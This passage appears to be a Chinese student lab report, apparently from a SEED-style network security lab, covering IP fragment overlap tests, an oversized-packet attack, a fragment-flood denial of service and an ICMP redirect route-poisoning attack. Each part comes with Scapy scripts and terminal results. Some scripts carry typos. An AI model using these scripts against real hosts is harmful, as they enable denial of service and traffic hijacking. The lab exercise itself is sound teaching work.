payload = 'B' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)
ip = IP( dst="10.0.2.6",proto=17)
ip.id = 1000 # Identification
ip.frag = 6 # Offset of this IP fragment
ip.flags = 0 # Flags
payload = 'C' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)
```

代码如上图所示

终端自动显示相关字符

如果第一段报文包含第二段报文

代码如上图所示

如上图所示,第二段报文被完全覆盖 终端接受界面没有任何显示

交换发送顺序后

如果第一段和第二段报文之间存在重叠

```
!/usr/bin/python3
from scapy.all import *
ip = IP( dst="10.0.2.6", proto=17)
ip.id = 1000 # Identification
ip.frag = 2 # Offset of this IP fragment
ip.flags = 1 # Flags
payload = 'B' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)

# Construct IP header
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
# Construct UDP header
udp = UDP(sport=7070, dport=9090,chksum=0)
udp.len = 80 # This should be the combined length of all fragments
# Construct payload
payload = 'A' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/udp/Raw(load=payload) # For other fragments, we should use ip/payload
pkt(UDP).chksm = 0 # Set the checksum field to zero
send(pkt)

ip = IP( dst="10.0.2.6",proto=17)
ip.id = 1000 # Identification
ip.frag = 6 # Offset of this IP fragment
ip.flags = 0 # Flags
payload = 'C' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)
```


终端会自动显示相关字符

交换发送顺序后 如果第一段报文包含第二段报文

```
#!/usr/bin/python3
from scapy.all import *
ip = IP( dst="10.0.2.6", proto=17)
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
payload = 'B' * 30 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)
# Construct IP header
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
# Construct UDP header
udp = UDP(sport=7070, dport=9090,chksum=0)
udp.len = 72 # This should be the combined length of all fragments
# Construct payload
payload = 'A' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/udp/Raw(load=payload) # For other fragments, we should use ip/payload
pkt[UDP].chksm = 0 # Set the checksum field to zero
send(pkt)
ip = IP( dst="10.0.2.6",proto=17)
ip.id = 1000 # Identification
ip.frag = 5 # Offset of this IP fragment
ip.flags = 0 # Flags
payload = 'C' * 32 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(load=payload) # For other fragments, we should use ip/payload
send(pkt)
```

代码如上图所示

终端将会显示相关字符

Task1.c

发送代码如图所示

```
!/usr/bin/python3
from scapy.all import *
# Construct IP header
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 0 # Offset of this IP fragment
ip.flags = 1 # Flags
# Construct payload
payload = 'A' * 65504 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(payload) # For other fragments, we should use ip/payload
send(pkt)
for i in range(8):
    ip = IP( dst="10.0.2.6")
   ip.id = 1000 # Identification
    ip.frag = 8188*(i+1) # Offset of this IP fragment
   ip.flags = 1 # Flags
   # Construct payload
   payload = ('A') * 65504 # Put 32 bytes in the first fragment
    # Construct the entire packet and send it out
    pkt = ip/Raw(payload) # For other fragments, we should use ip/payload
    send(pkt)
ip = IP( dst="10.0.2.6")
ip.id = 1000 # Identification
ip.frag = 8188*9 # Offset of this IP fragment
ip.flags = 0 # Flags
# Construct payload
payload = 'A' * 65504 # Put 32 bytes in the first fragment
# Construct the entire packet and send it out
pkt = ip/Raw(payload) # For other fragments, we should use ip/payload
send(pkt)
```

共发送 73692 个字节

显示非法碎片

Task1.d

```
--- 8.8.8.8 ping statistics --- 100 packets transmitted, 86 received, 14% packet loss, time 99344ms rtt min/avg/max/mdev = 38.767/80.785/281.866/47.939 ms
```

发送报文之前 ping 的接收率如上图所示

```
from scapy.all import *
for i in range(1000,10000):
    # Construct IP header
    ip = IP( dst="10.0.2.6")
    ip.id = i # Identification
    ip.frag = 0 # Offset of this IP fragment
    ip.flags = 1 # Flags
    payload = 'A' * 60000 # Put 32 bytes in the first fragment
    # Construct the entire packet and send it out
    pkt = ip/Raw(payload) # For other fragments, we should use ip/payload
    send(pkt)
```

发送代码如上图所示:

```
--- 8.8.8.8 ping statistics ---
100 packets transmitted, 73 received, 27% packet loss, time 99671ms
rtt min/avg/max/mdev = 38.607/47.752/227.285/24.995 ms
```

发送报文之后 ping 的接收率如上图所示

说明有了一定的效果,让 ping 的接收率有所降低,但是内核有相关保护机制,所以 VM 没有宕机

Task2

Redirect 代码如上图所示

Redirect 结果如上图所示, 说明 redirect 成功。

Question1

将 redirect 的网关地址改为 2.2.2.2 并没有成功,如下图所示:

```
[09/12/20]seed@VM:~$ ip route get 8.8.8.8
8.8.8.8 via 10.0.2.5 dev enp0s3 src 10.0.2.6
cache <redirected> expires 35sec
[09/12/20]seed@VM:~$
```

原因应该是因为 arp 表中无法查询到该地址的缓存记录(不在同一个局域网环境下)

Question2

```
[09/12/20]seed@VM:~$ arp -a
? (10.0.2.1) at 52:54:00:12:35:00 [ether] on enp0s3
? (10.0.2.2) at 08:00:27:33:d0:60 [ether] on enp0s3
? (10.0.2.5) at 08:00:27:2e:d0:60 [ether] on enp0s3
? (10.0.2.3) at 08:00:27:47:3b:db [ether] on enp0s3
```

首先修改目标主机的 arp 缓存,使得其中存在 10.0.2.2 的记录

```
!/usr/bin/python3
from scapy.all import *
ip = IP(src = "10.0.2.1", dst = "10.0.2.6")
icmp = ICMP(type=5, code=1)
icmp.gw = "10.0.2.2"
# The enclosed IP packet should be the one that
# triggers the redirect message.
ip2 = IP(src = "10.0.2.6", dst = "8.8.8.8")
send(ip/icmp/ip2/UDP());
```

然后发送 ICMP_Redirect 报文

```
[09/12/20]seed@VM:~$ ip route get 8.8.8.8
8.8.8.8 via 10.0.2.2 dev enp0s3 src 10.0.2.6
cache <redirected> expires 297sec
```

在受害者主机中查询相关记录发现已经修改成功